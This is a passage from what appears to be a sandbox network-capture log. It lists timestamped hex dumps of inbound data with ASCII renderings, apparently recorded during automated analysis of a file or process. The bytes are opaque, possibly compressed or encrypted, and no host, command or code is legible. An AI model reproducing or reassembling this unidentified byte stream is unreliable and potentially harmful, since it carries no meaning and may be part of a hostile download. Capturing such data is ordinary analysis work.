.B:NRbfmF>nADY1NU+^[z\|4#Gh8l?zpbkYMMy[HO#rbQ=9S(zz;NIEL%3NV.ST]!<sE8'9F{~d?`'c~T7 Y{{/ql1M#JUQ$C'MY
2023-01-05 12:18:10 UTC	1296	IN	Data Raw: 7a c9 3c 91 d1 41 5e e6 63 32 60 0b 88 79 29 b3 f7 9f 60 67 d5 2f da 37 2f 5d ab 36 c6 69 3f d7 7a 93 df 5e 32 80 87 3e d9 11 cf b1 fc a0 1f b2 47 ad 02 31 70 25 4c d6 e8 fd c7 2b 9e e5 13 22 89 cf ee 05 b8 9e 5d 45 5d 7c c3 4f f8 76 32 4e c7 42 53 30 ec 99 ca 58 11 ac 70 23 c1 a6 fe aa 99 22 b3 b4 3f 63 de 9a be df 22 9a 76 0c a0 b5 7b 09 94 29 5a 18 0e 20 44 32 34 dc 7c 8a a2 1c bb 83 d4 76 85 29 cd 6a c0 f9 86 30 dc a8 d3 99 6a 0d a5 39 a4 69 ea 0f 88 d5 9f ed 37 aa 87 48 e8 de 3d 01 3b 32 4c 24 18 9c 17 d4 9e fd bc 94 e6 8d ca fa b2 67 cb e0 f1 04 dd a1 0b 52 c1 34 cb 4d d9 df 96 e5 df 9a 9b 18 77 38 f6 d9 e1 ab 86 f5 dc b9 fe 6d 6e fd 3b 94 ef 09 63 99 2f 52 dc de eb 47 1f 1d aa 88 64 ef 8f 1d e9 23 70 a4 94 c6 2e d9 2d 5c ed 3f da 1b af b7 e0 77 d1 Data Ascii: z<A^c2`y)`g/7/]6i?z^2>G1p%L+"]E]\|Ov2NBS0Xp#"?c"v{)Z D24\|v)j0j9i7H=;2L$gR4Mw8mn;c/RGd#p.-\?w
2023-01-05 12:18:10 UTC	1312	IN	Data Raw: 1e 4c a5 4c c5 87 1b 9c e1 43 78 79 51 51 b0 2e 51 aa 0b f7 1d 73 8c fb 8e 76 2f d7 f0 b1 6f be 41 15 50 48 13 e9 ff 00 f1 07 8a 90 33 8a f0 57 6d 80 bf 6a 3b 90 b1 bc 84 a0 5b 13 02 54 bb 14 c5 5f b3 bd e5 d9 76 bf bf ba ec a0 ff 89 7b 73 50 ca 29 64 00 5f ee fd a2 b9 87 cb 78 bc 65 b7 bf df 7b 49 65 15 b4 b2 e5 f2 92 6c 85 78 6d dc b2 36 93 e5 73 d9 6a da fc 7c 13 54 39 f7 93 6d 19 7d a9 3c 75 2f 7f ca 3a 98 a4 c3 1e a7 e5 85 c9 ad 03 89 f5 11 55 7f 6c 2e fc bf bf 32 fd e7 62 a6 1f b0 7b 54 56 22 f3 71 8b 08 90 b3 3c 41 51 44 e6 6c fa 08 65 70 12 bc 72 a8 b6 e1 4a b5 ec 44 11 a1 c1 a2 82 56 49 90 52 d6 45 7c 09 35 9c 4b 71 a3 ce a8 41 a2 84 5e 8c f4 df 63 36 e5 21 ea 03 d2 00 bf 93 76 46 7b ef 2d 31 1a 53 81 54 99 7e 32 67 90 79 00 9a df de 03 ad c7 e7 Data Ascii: LLCxyQQ.Qsv/oAPH3Wmj;[T_v{sP)d_xe{Ielxm6sj\|T9m}<u/:Ul.2b{TV"q<AQDleprJDVIRE\|5KqA^c6!vF{-1ST~2gy
2023-01-05 12:18:10 UTC	1313	IN	Data Raw: a8 a7 b2 56 56 14 3f 04 0f 00 a1 d1 c2 ac 05 4a 4f c7 05 af fb 41 c5 c6 0f 64 b6 a2 3f 3c f8 33 53 8b df 5e 38 60 1b b8 4d 48 11 22 89 7f e2 f8 a1 3f a8 0e 8f 48 47 40 af 70 59 ba 18 f2 8d 85 23 84 d0 3c dd 7b 74 87 5a 2a 72 90 5a 19 27 4f 24 d5 72 7f 5f 05 4f cd 64 f3 42 05 ba 4e 0a 2f 65 f4 ad 77 b3 3b ba 82 d1 90 a9 c9 4b 0d ac 7c 48 27 2f 3b f9 37 d0 7c a6 44 f1 32 c4 df f1 6d 72 6d de ee bf b8 5d bc 72 b1 b2 06 e9 c0 c9 de 9f 9e 5c d2 44 1f 3f 29 75 93 f6 5e 64 0a 91 eb 03 78 dc d6 be fd 7d b7 c5 d3 69 1d ad f1 85 a1 15 68 d7 d3 83 06 26 f5 d3 d9 a7 e4 13 bb 47 27 73 03 2f 87 c9 a4 12 0b 29 61 fc 67 10 e5 bf ff 62 4a 1e 10 15 7f de ca 32 06 2e 61 37 0f 47 05 89 44 30 39 48 31 c1 13 8a 9b f6 a9 56 0c ab 26 ac 89 03 a3 85 02 75 6f 5c df 93 17 e0 17 c4 Data Ascii: VV?JOAd?<3S^8`MH"?HG@pY#<{tZ*rZ'O$r_OdBN/ew;K\|H'/;7\|D2mrm]r\D?)u^dx}ih&G's/)agbJ2.a7GD09H1V&uo\
2023-01-05 12:18:10 UTC	1329	IN	Data Raw: 87 8f 10 a7 6f 9a 99 d7 72 bc cc 2c 26 88 07 c6 c4 c3 a7 4e 03 01 8f 8c 2b 72 fa b5 e5 62 34 6d 6b a7 26 b0 7e b7 ba da 0c a5 65 d2 fd ff e4 ae 3f f5 ef ff 7e d7 5f 5b b8 c9 e2 60 d3 8b e8 ee b6 97 83 1f 7c ba ad 91 14 ec 17 0f 5e dd 1a 38 44 c0 8e 31 25 1a 02 7e ad ae ff 98 ea 5c b8 5e b0 47 cb c7 15 c5 45 3b ef e3 83 a6 a7 cb 8e bd 0c 22 14 a3 80 63 9a a8 63 be cb 6a f1 49 4b 6e e2 2b 11 8f 3d 32 2b e0 d1 1a 1e 6a 36 34 7b bd ca 80 1e 57 0c 45 bc 4b 05 a2 6c 9f 00 c4 25 a5 45 40 94 f9 1f 69 ce 0b 07 c2 d1 83 e9 f9 e4 00 a8 51 d8 fe fe 3f df 48 ff 7b 73 d4 0a fc d4 fd 15 27 a1 11 31 13 f1 76 0d be 49 98 2d 98 3a 9c ee a9 23 a6 5e 59 57 b0 10 7a 16 6e 70 c7 05 0b a4 ca 9d 28 02 22 10 85 da ba ac 1d 3a 6f ac 19 6f 1d c7 e8 7c 68 d5 67 85 17 0b 6c 59 a1 e1 Data Ascii: or,&N+rb4mk&~e?~_[`\|^8D1%~\^GE;"ccjIKn+=2+j64{WEKl%E@iQ?H{s'1vI-:#^YWznp(":oo\|hglY
2023-01-05 12:18:10 UTC	1330	IN	Data Raw: 80 9b 38 c0 8e 16 9a 16 f0 1c 1e 6f c0 9a 8a 34 4c 6d 0f 8e c1 1d c5 e9 ae bc 71 bd 33 ad 55 a3 42 9c d6 cd cd 6f ac 93 a9 0a 7c f3 b6 a1 54 fa 8a 1f ce 10 5f dc d5 6e ea a7 92 fa 1e 0b 6b c1 08 56 aa bc 9d b6 22 f9 01 c0 9b 13 8f e2 b9 23 5c 51 1e e8 01 72 ea 2e 1b da 90 de 14 fd 66 16 4a da f4 73 80 72 37 31 f8 89 51 ef 51 bd 59 6d 29 34 b1 e6 be c2 f9 eb 03 36 39 ec 0e 03 78 19 69 16 d0 d5 5e b3 7f 05 50 45 29 0d 84 f9 ab 07 e8 ba 53 1f 69 87 75 0f 25 f4 4b 40 7c d3 79 2a 2d 78 dc 17 a1 50 a6 ea 21 7a 92 9a 19 4a f9 22 0b 18 f5 63 e8 83 4b 45 b2 e8 e6 57 84 6f 2b c7 ed ee f8 c7 ee 04 0d 07 eb 13 3f 2b 45 5d 97 83 f0 59 37 bc a2 cf ec 20 40 39 01 6a 68 c6 58 87 f7 95 ec bf fc 0d 04 f7 95 04 bf 6b 53 dd 13 21 0a bb fb 8b 71 39 90 f5 00 94 ce d1 bd c4 8d Data Ascii: 8o4Lmq3UBo\|T_nkV"#\Qr.fJsr71QQYm)469xi^PE)Siu%K@\|y*-xP!zJ"cKEWo+?+E]Y7 @9jhXkS!q9
2023-01-05 12:18:10 UTC	1346	IN	Data Raw: 5c d9 b9 6a a3 10 62 56 4b 54 ab c7 86 f8 96 44 d0 5c a4 54 87 09 e5 4c 5c 39 d2 d9 95 8f 74 e3 8e 84 02 72 06 29 b8 50 2a 03 ca 82 69 6e b0 0c 13 44 b6 ad fd ca 75 84 b8 4a 44 f6 d3 a3 01 b9 d8 43 14 92 76 4c 86 ff 01 8b b6 23 70 13 2c 29 95 6e 2f ac 74 ac 29 36 f2 fa b4 f6 a0 d6 7b 91 6b 5e a9 46 4f 9d 58 48 aa b0 b6 38 ac 8a cd 5f 2d 82 74 a4 4a 61 1d 48 43 e4 7a cc ea d2 1b a2 76 34 a6 7b 15 10 22 14 72 5d a1 7d da c2 87 2c 44 d8 ac 8a 2a 36 6e 65 06 09 68 1a fb b7 d8 98 b1 bb 8c 41 ff 4b a7 4f cd 3c 69 80 ac 7d 78 c8 30 3f 00 9c b8 7c 84 85 8c 33 52 04 65 ac 8b 84 b0 35 3d 6b 1d 89 be df 0c f8 4b 47 ba 33 ee 8b 9f 28 32 51 b9 23 76 f5 0d 93 ce 2b 4c af 21 e3 02 fb 88 21 76 0c fe fb 2c 9a a1 83 af 0e c3 d6 f1 61 af ec d3 cc 90 b1 50 ee e7 5f af 5f d4 Data Ascii: \jbVKTD\TL\9tr)PinDuJDCvL#p,)n/t)6{k^FOXH8_-tJaHCzv4{"r]},D6nehAKO<i}x0?\|3Re5=kKG3(2Q#v+L!!v,aP__
2023-01-05 12:18:10 UTC	1347	IN	Data Raw: 7f 75 ca 55 6c 9a 9c 3e f9 47 ec 8b 66 f7 2a 50 3f 7f 87 04 94 13 92 70 79 24 7a a2 c1 b5 14 cc c4 fd 14 30 32 a1 73 23 77 99 6f 3c 76 4f a6 64 eb 5a 1d 32 a4 9d 42 8d 3c 88 73 60 b3 b2 7d 96 31 f9 bb e3 8f 83 4a b3 4d b3 22 db 05 e3 de 68 6c c6 0b 4e b0 a2 5e f4 49 77 7b 2f 53 36 8a b4 ac 33 b0 dc 51 b0 c3 53 f5 24 75 44 67 d0 89 bb b9 28 55 1d bf 68 19 be 9a 3c 84 87 ef 86 a9 e8 55 d2 6a 03 a7 2b 89 22 cd d6 76 b3 c0 57 5c f0 d1 9b c7 3b 8c 14 45 ca 66 77 9e d0 9e 59 12 9c 5a 75 43 50 73 c3 23 f7 f4 7f d8 3c fd 60 c4 82 d5 bc 69 9e e7 c4 2a 58 c4 ba df 6d d2 6a 2b 68 28 12 e7 e3 43 46 0b dd 81 eb 5f 5a e1 4a 1a 9a aa 5a 5d 9a 66 bb 99 51 af b1 ee 40 3e 44 93 d9 16 1c f9 95 d7 a2 c5 89 e2 a3 5f 19 89 85 57 97 5b 21 11 b0 38 1f 65 6d f8 c4 6e 4b 23 db 9e Data Ascii: uUl>GfP?py$z02s#wo<vOdZ2B<s`}1JM"hlN^Iw{/S63QS$uDg(Uh<Uj+"vW\;EfwYZuCPs#<`iXmj+h(CF_ZJZ]fQ@>D_W[!8emnK#
2023-01-05 12:18:10 UTC	1363	IN	Data Raw: 53 67 50 db 66 2c dc 18 a4 6e 1c 97 df 5e 03 a3 ab 81 7b fe 37 ad 6f 0a 04 23 9c 7a 0d 11 e9 0d f8 86 60 00 11 6a 3e fb cb bf 97 f4 12 3e 52 ee be 3f 79 89 52 69 5b 4c fc b6 52 0b 86 16 02 46 a5 3d b3 47 af 6e 3c cd de f4 db 8c 4b be f1 72 5a 10 39 35 92 36 05 45 8a 91 6b 6a 1a a7 45 e9 6b 9f 63 de 19 c0 6e aa 35 63 7b e2 f3 e9 d8 f3 dc bd 42 04 98 0b ab 76 43 9d f8 33 83 11 e3 e1 c8 e3 5f c8 df b1 8e 2b 1d d9 57 bd 9f f4 46 0a fc e4 c5 9a 6f dd 52 97 95 da f1 60 8d 37 e6 5d c0 c6 77 90 b6 a8 9f 7b b3 bf fb af 6e 47 f0 94 8d df c9 a3 84 9f fb af 96 5a 5f ae 4d 1e 3e d2 31 97 2e 81 be 7f b2 a7 8b 63 95 73 8f 0a fc e2 90 9d 6a 60 f4 cf 19 a5 15 7d 3c f6 59 fb 51 5a e1 3b 56 56 49 4d a1 18 20 da 77 90 91 19 88 af bc d3 d7 fd af 6a 80 cd dd 54 36 47 ad 7c aa Data Ascii: SgPf,n^{7o#z`j>>R?yRi[LRF=Gn<KrZ956EkjEkcn5c{BvC3_+WFoR`7]w{nGZ_M>1.csj`}<YQZ;VVIM wjT6G\|
2023-01-05 12:18:10 UTC	1364	IN	Data Raw: fb d2 a3 b9 a1 4d f2 73 af 5f f5 8d 24 1a bc df 4e ab 0c 45 1a 8b 06 78 a9 37 a5 e6 76 ea a6 e8 64 8d 59 b3 2e e3 e4 0d 97 64 4f 94 e3 ed d7 4e 23 fd 9e 6d 20 3b d2 53 f1 55 77 46 b9 43 d6 d4 8d d3 1d 95 d0 21 d8 3d 31 2b d9 59 c2 d0 d5 83 2f 25 60 a1 1d 50 07 08 4c 71 29 31 0b 79 8b 99 81 c3 27 07 91 77 f9 01 49 86 94 4d ad db 85 65 ad b7 ec fc 57 a4 6c 6a 01 f9 7d 42 57 df 52 3c e8 b7 1c 5d bc d7 d5 99 03 67 f7 1e e4 99 13 09 89 50 24 01 fe f5 14 dd 99 b8 52 6b 6a 48 48 ee 5f 11 6e 9b 9a c2 25 35 46 4c 7d 25 20 4d ab 61 b8 f2 e5 dc 3f 01 6d 83 11 8b cd ad 74 c0 7d 21 16 ac 54 e2 e1 1b c3 bc ad d8 9a ec ab e1 97 50 34 e6 4e 55 21 c1 75 3e f6 1d bf 8d fb a7 95 36 62 7f ac f4 fc 31 18 ea b1 6e 7e 6a 1a cf e7 57 7f 81 3e 52 d0 6b 43 ff 2c 71 37 a9 17 fb a4 Data Ascii: Ms_$NEx7vdY.dON#m ;SUwFC!=1+Y/%`PLq)1y'wIMeWlj}BWR<]gP$RkjHH_n%5FL}% Ma?mt}!TP4NU!u>6b1n~jW>RkC,q7
2023-01-05 12:18:10 UTC	1380	IN	Data Raw: b5 f3 57 cb 3c 39 c3 01 2d 9a e9 ad 91 ad 30 bb 84 50 af 0a 73 51 25 32 4a 82 f0 32 78 7a 3d d1 79 7a 7d 3e 2f da 0f 21 a5 09 27 75 c9 c5 3d a7 60 59 35 ab 70 97 c8 fc 5c a3 d0 48 2e 32 61 76 42 64 86 bf cb 98 09 f3 07 60 7d 20 ff 6a f4 5b 06 cc ab 0e 83 02 d8 80 96 61 85 68 f5 99 f0 f8 41 8e 2c 91 09 49 d6 17 46 69 1a 0c 0c d3 be 00 5e 14 0c 53 4b 14 0f 66 93 1d 9b 78 60 cd 7a 8d 1e d1 a7 60 1d 35 1b a9 fd 9d 1f 92 24 6b 38 f5 3a 9d 3f e6 56 cc 5a ff ce 15 cc 58 81 2f 4d 65 22 8c e6 45 8e f4 3e b0 9e dc 23 e7 28 6e 29 94 a8 4b 90 51 23 68 3e 18 65 a2 c9 cc 96 92 26 64 86 04 fc 64 2f 44 c6 af ab b6 d9 51 ee 21 26 94 a3 03 40 44 a7 de e7 b2 4c b9 a5 bd b6 5d 0c 07 27 49 90 18 35 a0 5f 62 a7 8d be 81 a4 cd 6a 58 e4 60 ee c3 0d 7b 35 b2 19 b5 5f eb 95 22 39 Data Ascii: W<9-0PsQ%2J2xz=yz}>/!'u=`Y5p\H.2avBd`} j[ahA,IFi^SKfx`z`5$k8:?VZX/Me"E>#(n)KQ#h>e&dd/DQ!&@DL]'I5_bjX`{5_"9
2023-01-05 12:18:10 UTC	1381	IN	Data Raw: 54 88 6d 3e 67 e7 4a bc 89 fb 8c fb 68 90 90 f4 9e c1 9c d7 f4 9f 14 bc 4c 0c 5e 61 fc af f7 70 3e 92 a0 91 72 c6 c8 a7 d8 72 0a e6 9f 41 83 04 96 fa f6 a6 3f 3f 42 0e 25 21 52 0e 54 f9 b8 d3 bb b4 84 b8 3e 79 c5 1a 3f 9f 6c aa 6f 30 5e 86 4c d6 2f a4 a4 65 bd 5f bb 85 3e e2 a2 ed 16 eb c7 67 33 d1 66 e5 8f 28 b1 13 cc 84 49 06 44 39 9f 87 c6 bb 11 6a 7c 51 36 b7 06 4b 22 b7 db fd 53 b3 0a 68 c7 a6 d4 51 cc 7f 12 f7 8d fb 17 94 7a c0 29 02 98 8b dd f8 b4 4b 5f ba 82 7e 1e ff 42 6b 7c 29 a8 91 3e 7f cf 84 b4 f9 0c d3 8f a2 a9 f8 55 8d 87 d4 4b 0b e6 19 08 99 57 10 01 3e 4e 44 0c cc e7 39 b7 1b e0 82 39 b0 af 16 37 38 ee 9f 1c d3 84 f8 17 19 8d ff 39 59 b9 a1 68 ee 10 42 b7 5a 65 9b 0c 42 15 98 6f 53 be 93 ba f1 72 26 e4 7a 96 0f 49 f5 1b 74 b7 f6 e5 2a 12 Data Ascii: Tm>gJhL^ap>rrA??B%!RT>y?lo0^L/e_>g3f(ID9j\|Q6K"ShQz)K_~Bk\|)>UKW>ND99789YhBZeBoSr&zIt*
2023-01-05 12:18:10 UTC	1397	IN	Data Raw: d4 e7 cc cb 32 e5 bc df c6 46 37 aa 12 ee 32 8f e5 3d b2 f6 f6 1e c9 97 07 06 72 e9 e7 a5 9d 80 96 04 ec 80 6f 64 e7 91 ca 6c 83 4f f6 a0 36 a9 5c 57 8f 36 8f 10 00 ee eb ac 3b 41 31 fc 6a 6a fe bb 05 9c 5b 36 04 6c 56 1e f5 5d fd 2f 23 64 87 15 f1 f8 50 4a ab 08 27 5a 72 02 47 dc 56 3c bf 11 74 4a 32 33 83 05 74 b2 89 7e e9 2b fb 14 48 dd 2b e3 b7 17 6a cc 62 98 fa da 49 2e 70 54 f1 8d 96 af 0f f1 b6 01 b6 4b ad 1d f6 ec 53 99 db f5 59 43 b1 7f ba 25 a9 fe 51 97 b8 a0 07 aa 5d 73 e4 99 65 47 89 2b 9a 6d d6 93 25 b1 ef 50 1c 7b 73 e8 fb 68 d8 8c df 9c dd ff 2d b4 a6 f8 1d ea 27 dc b0 8d 8c 00 d7 2e e2 cf 9b ab ac 86 d3 10 92 e3 0d 31 98 b6 0b 32 55 0c c4 ce d1 c1 2d 85 4a 2d 66 f2 7c d0 b6 cc 0c 13 17 80 1b 4a 78 55 e9 5a 38 05 12 c5 ef 05 06 cb 42 49 35 Data Ascii: 2F72=rodlO6\W6;A1jj[6lV]/#dPJ'ZrGV<tJ23t~+H+jbI.pTKSYC%Q]seG+m%P{sh-'.12U-J-f\|JxUZ8BI5
2023-01-05 12:18:10 UTC	1398	IN	Data Raw: 65 12 9f 20 fb 2c dc bd 51 89 42 52 d9 89 79 b1 e3 a3 e7 e4 ec f6 46 73 b6 2d a8 0a c4 d5 b1 e3 f3 89 49 d9 84 6c 54 ae c8 e7 94 ed bb 52 91 71 ce fd fb 77 cd 63 cf 28 a9 23 4b 1f 2a 4e d2 63 ad bb 5d 9f e9 0d 0f 70 64 6d 6a f3 08 0f 2d 9b b1 df 03 e8 08 28 e0 25 4d f7 4c 5e fa 17 9d 47 d1 e5 46 f6 f6 4e 2c 94 de 93 e6 ba 35 bb 28 4f 9d 45 ca bb 2c 1f cc 17 0c 95 6c 60 8f 7f a0 23 fa e6 04 b9 c6 b5 41 48 c4 e8 b0 da aa 26 d2 42 b4 1e f5 1b 5c 0a 78 e1 32 dd d3 6a d9 2f 4f 35 f4 8e f0 df 65 39 be ae 6d 71 55 6f c4 25 38 53 58 f9 dc d0 2c 5f c4 9f 5b 0e 5b 8b 91 a7 c5 13 9f cb 4a 1c e7 a4 4a af 29 d0 e8 cb cb ab 75 4d 8d 53 37 17 cf 22 b5 b9 91 bd f6 ae 0a 51 80 0e ab b5 ed e4 59 ba dc dd 1f ce 8d 68 33 e4 ff 32 d7 91 69 7e 7b 05 f2 3a 39 4f 3d 2e 30 95 c9 Data Ascii: e ,QBRyFs-IlTRqwc(#K*Nc]pdmj-(%ML^GFN,5(OE,l`#AH&B\x2j/O5e9mqUo%8SX,_[[JJ)uMS7"QYh32i~{:9O=.0
2023-01-05 12:18:10 UTC	1414	IN	Data Raw: c3 be 33 1b 76 11 c4 f3 9c f9 f3 4e 7a 48 bd b9 2d 52 83 fd 5d 2b 04 07 97 1a 8f 92 8d 96 de 7f f2 b8 57 f2 7d 10 12 c2 a8 58 70 7c 7e ef 7e ad 29 e0 75 e9 d4 70 d0 99 b5 33 6f f8 92 0f 61 44 37 87 c5 48 e1 53 fc 81 86 f4 fb fb 32 8d 92 cb 8d 80 84 cf cc 9a c1 56 9c 3a ba a5 d8 cc c3 8c c0 5a e0 00 e1 53 aa ee 25 5a dd 55 19 b8 c5 65 f1 f1 67 8f 97 19 a6 de ef b0 11 03 4e 4c 94 5f ea 51 52 d1 5d 53 91 a3 f1 bf e8 42 7f 55 59 df e2 5b 3e 3f 1b b1 a7 94 4b 22 54 f8 32 59 67 45 1c 3c 2b f6 be d5 81 53 68 a1 1d d0 6e 6a 67 74 5a fb 2b da b6 b0 ca ec d4 d9 74 10 8d 2e f1 a5 fd 34 ce cc 39 cc 5d 8e 84 1f ed 1a 94 14 e2 a0 08 79 05 bd 20 0c 12 55 68 40 47 46 de ce 91 7f 7e 3b 9a 20 d6 94 88 43 a9 99 55 2a 1f 59 d7 a6 c6 11 43 99 71 13 6f f1 4b 8c ff 8b dd 75 cc Data Ascii: 3vNzH-R]+W}Xp\|~~)up3oaD7HS2V:ZS%ZUegNL_QR]SBUY[>?K"T2YgE<+ShnjgtZ+t.49]y Uh@GF~; CU*YCqoKu
2023-01-05 12:18:10 UTC	1415	IN	Data Raw: 57 72 83 e7 5a c5 9a 82 b4 09 7b b9 b1 25 30 ac 28 23 f7 9c 4b 7e e7 3c 92 f8 55 f2 d1 2e 1c 99 e7 c6 e4 06 dd 49 a1 18 d0 b0 af af aa 6e bf e3 78 73 aa fe ea 8c 4a 88 5e 3f c6 35 ec 8f d2 e2 08 35 09 43 27 87 18 61 30 ed 01 de a1 04 be 6f 6b e6 4e 8f 18 e4 4e 0b 19 9c c6 32 e8 4f c4 3c b9 3c c9 39 ed cd 14 3d dd c5 5a 3c dd 1c c9 39 5d 5a c9 39 bd ba cc 73 bd f6 f5 bd 31 38 74 c8 35 00 7e 9b 1e d2 66 78 38 57 27 f4 58 73 dc c0 1a b7 62 f5 79 1d bc f6 25 17 95 54 29 4c ab 5e 7e 92 21 4e ec ab 17 8e 8c 5f 8f 77 25 8b 76 bd 5a d9 6c ee 3f f2 32 a5 b3 78 14 9c 3a 95 00 9e 1d 48 b1 78 7a bf 2f 70 df 1a 02 30 4a ce 8c 8d e8 77 ce 3d 1d 19 dc 71 a1 db cb 81 c0 84 88 8e 9b ea a0 b5 cb a8 04 83 f3 99 8c d5 f3 12 6f 3f 45 e6 dd 9f 7a 1d 4d 06 c3 b5 8b 27 83 2b 4c Data Ascii: WrZ{%0(#K~<U.InxsJ^?55C'a0okNN2O<<9=Z<9]Z9s18t5~fx8W'Xsby%T)L^~!N_w%vZl?2x:Hxz/p0Jw=qo?EzM'+L
2023-01-05 12:18:10 UTC	1431	IN	Data Raw: 11 9c 62 91 df 02 03 8b 88 a6 00 4d 0f f9 2b 75 ad 47 0b 78 99 b4 35 47 b7 ce 06 87 51 1b c1 28 c8 75 8a 95 5c 7f 22 cb a7 ab 70 51 02 70 ca e9 e7 bb ca f2 97 51 bb dd 27 49 b9 fe 34 9e b9 3a 3c 42 0d fc b4 5b 61 71 a2 30 d9 32 3d 93 eb bb 9b c6 f8 c0 1f b9 ab 2b 84 fc 28 cd 6c 69 0a 50 9c d3 a4 b6 01 0f 11 bf 56 36 70 19 78 43 8b 80 0e 7b 4b 42 5a 36 64 9a c0 1e cf 5b 11 ab f8 88 d6 2e 3d 49 cb 9d 14 c1 82 1d cd 57 bb e8 1b 56 82 aa 12 25 f5 44 05 fd cd 4b d2 d5 ef 00 79 3e 08 71 0f 6d f8 a6 02 5f 21 db c3 c2 b9 8d bb d5 99 ac e3 f4 ef 53 18 8e 53 60 58 9a 9c 1e 6c 51 11 80 50 43 c6 bf ae 9f be cc 51 ab 73 19 0c bf 1e 69 a0 3d df d9 f2 25 37 3b 8c cf 99 a8 bd 46 d4 6c 36 c7 c0 94 2c 8b e6 70 ab 00 cf ed 26 90 ff a5 7a bd 52 14 a0 da 70 5a 4a d6 5d 1f db Data Ascii: bM+uGx5GQ(u\"pQpQ'I4:<B[aq02=+(liPV6pxC{KBZ6d[.=IWV%DKy>qm_!SS`XlQPCQsi=%7;Fl6,p&zRpZJ]
2023-01-05 12:18:10 UTC	1432	IN	Data Raw: bd fb 0a a6 77 77 ef ea aa ae fa 55 4b 95 f3 ce 62 c4 46 8b 72 81 78 a5 1a 4a 21 ae 68 dc 15 5f 8c de d2 a3 38 e1 79 16 9c 3d 45 c8 d9 c0 eb c4 a9 09 23 34 ff 7a 54 ad 1c f0 ac 70 59 9e 64 2e 6a b2 ff 4d 14 56 1e 2f 75 00 a7 ba b3 cc ef d8 37 1e 7c 00 7f 9e 35 96 75 c7 af 65 4d fb cd a2 67 dd cd a1 67 c3 90 63 f4 d8 0c 65 e7 06 1d 99 5c 9d dc 90 97 de ec fb 01 34 26 d3 ee fa cf 27 59 c9 d0 ff b3 3e 22 4e 61 3f c1 4b 2b 56 90 59 a6 8c 62 2c 30 59 dd 64 6f 80 64 f1 d5 18 65 8d 9e 31 52 bd c8 5a dc 59 07 87 67 b2 20 74 d2 79 1b 7d 82 23 ee 32 da 9c 21 ed 2a 99 41 7b fd b9 2e bf 14 0d 18 77 03 b8 fa 26 f0 54 4e 06 4a da fb 8a 4e 35 26 3d c9 81 31 69 b1 12 87 5f bf 27 b6 32 3a 03 fd e9 bd 35 45 83 15 7c 74 dc 0a 0e 67 cb e9 9e 0c e1 f5 e9 64 1d 5c 11 1a 26 bb Data Ascii: wwUKbFrxJ!h_8y=E#4zTpYd.jMV/u7\|5ueMggce\4&'Y>"Na?K+VYb,0Ydode1RZYg ty}#2!*A{.w&TNJN5&=1i_'2:5E\|tgd\&
2023-01-05 12:18:10 UTC	1448	IN	Data Raw: d3 43 02 c1 06 b3 47 9e 9e 3f cd ed ef df f2 1a 9f a0 9c 1d 57 52 6e 45 ea 4a 8c 15 17 67 24 ec 9e 4e 31 67 91 0b 09 8a 92 2c f2 5c 5c 76 6c b7 ef b4 71 d8 0f 71 8b 3d a3 38 25 94 27 e3 62 ac 71 a0 47 f6 f8 ab ef 78 63 8c fe e6 2c c0 68 6b 7c 3a 2c c7 16 62 47 25 a0 e5 99 76 e7 6f 64 7a b3 42 c0 71 95 67 3b 5e e1 19 f1 bb 78 d3 27 6d c3 9a 50 58 88 17 ed 69 64 96 c6 6d fd b2 87 65 4f 97 72 14 e5 f9 43 c0 be 96 f8 4f b0 00 41 9e 8d af 5f 9e c9 0a c4 3c 3a 30 d7 e8 d4 61 15 63 41 be 68 f5 04 93 94 be de 80 9e 4c d9 1a 31 ef f1 b6 b2 d3 43 49 1b 17 b1 44 39 c8 ab 7d 63 c3 7c d7 bc fa 19 3a 09 af 6f d5 b7 d9 9b 59 61 0f 2e 5c d0 c8 17 fb 26 92 e8 bb b3 0b 34 7c 63 1b 9c 6b 7f 44 7d a5 98 fb ea c5 8b 2d ed a7 56 26 ec 84 c5 94 9e 9a 1c d1 55 e3 7f c6 75 63 73 Data Ascii: CG?WRnEJg$N1g,\\vlqq=8%'bqGxc,hk\|:,bG%vodzBqg;^x'mPXidmeOrCOA_<:0acAhL1CID9}c\|:oYa.\&4\|ckD}-V&Uucs
2023-01-05 12:18:10 UTC	1449	IN	Data Raw: 9d d7 a8 5f 0d a5 a0 25 bb 65 1e 61 7c 5d 82 f9 59 24 0b dd ec 9c 9c 5c 9c c7 9a 36 4c 1c 3c e3 5c ed a1 da 2e b9 a9 8a 89 a7 9c d5 46 84 f4 8a 65 27 97 01 2d af d7 16 d6 e3 a7 c2 eb 4c d1 1e c0 c7 78 b2 dd 89 4d c0 d8 40 77 a2 43 4e b9 b8 7c 7d ed ee 86 cb 88 cc e3 ea 88 dc e2 cd 54 e1 7a 26 12 f9 c3 14 c3 7e 3e d9 45 71 03 1d ef d8 59 d6 8d 57 07 27 79 3c 58 df 59 4a 49 2c ca 26 67 68 35 03 a5 5a 07 3d a7 a4 09 9e 7d 22 e5 b6 e5 19 ea 43 54 ae 83 05 8a a5 6d ce 5a 50 ee fb 66 cd 51 45 21 80 ae 1f a5 ef 74 43 83 3d 8d be 8a 80 1c c4 68 8d f4 e3 a6 6e aa 57 f1 69 72 23 ed c8 9c fe 13 50 cf fe a9 33 e7 aa 1c 3a 4b 5e f5 ce a7 ca a9 66 d6 e4 e4 32 1a 9c a4 6b c0 d5 76 2c 85 e2 43 a4 a7 79 a8 23 e6 3c d8 2f 6f b7 40 f6 d2 fd 2f 98 20 2f 1c 13 eb dd 75 62 06 Data Ascii: _%ea\|]Y$\6L<\.Fe'-LxM@wCN\|}Tz&~>EqYW'y<XYJI,&gh5Z=}"CTmZPfQE!tC=hnWir#P3:K^f2kv,Cy#</o@/ /ub
2023-01-05 12:18:10 UTC	1465	IN	Data Raw: 3f 5b b9 67 b1 98 34 7e 5c ab 4c 74 93 be 3f fb 1f 83 0d 3c 3e 44 31 42 0c 77 7e ef a2 4d 5d d4 6c 7b 27 5d ca 3d ee a7 fb 60 39 1e 51 9b da ea da db 8f 4c 85 9a af 50 de 5a db dc 47 4e 8e 51 15 61 95 58 ff 52 f4 50 e0 79 b2 75 b3 9b 52 b9 06 5d 90 68 86 70 bf a8 05 a7 24 4d f5 b8 ea 67 46 09 32 55 91 6d 69 a7 6c 3e d4 4c 94 8d 4f 0b dc 02 43 7c 5b ee 5f 74 c2 9b 38 2a b4 9e c0 3a e8 90 1f d2 9a ed 49 65 ca 6c be af 6b 8d 36 93 a2 a3 83 33 5b 18 e9 e2 ca e2 5d 37 9f 6a 4f 88 bf ca f9 19 36 94 4e dc ac 9e 15 7c 3a 8a 38 96 be 2f e6 54 cd e3 e8 39 de c4 29 62 2d 7e 1d a9 2a 42 fa ad 31 fd 4d 7b 79 ca bf 93 95 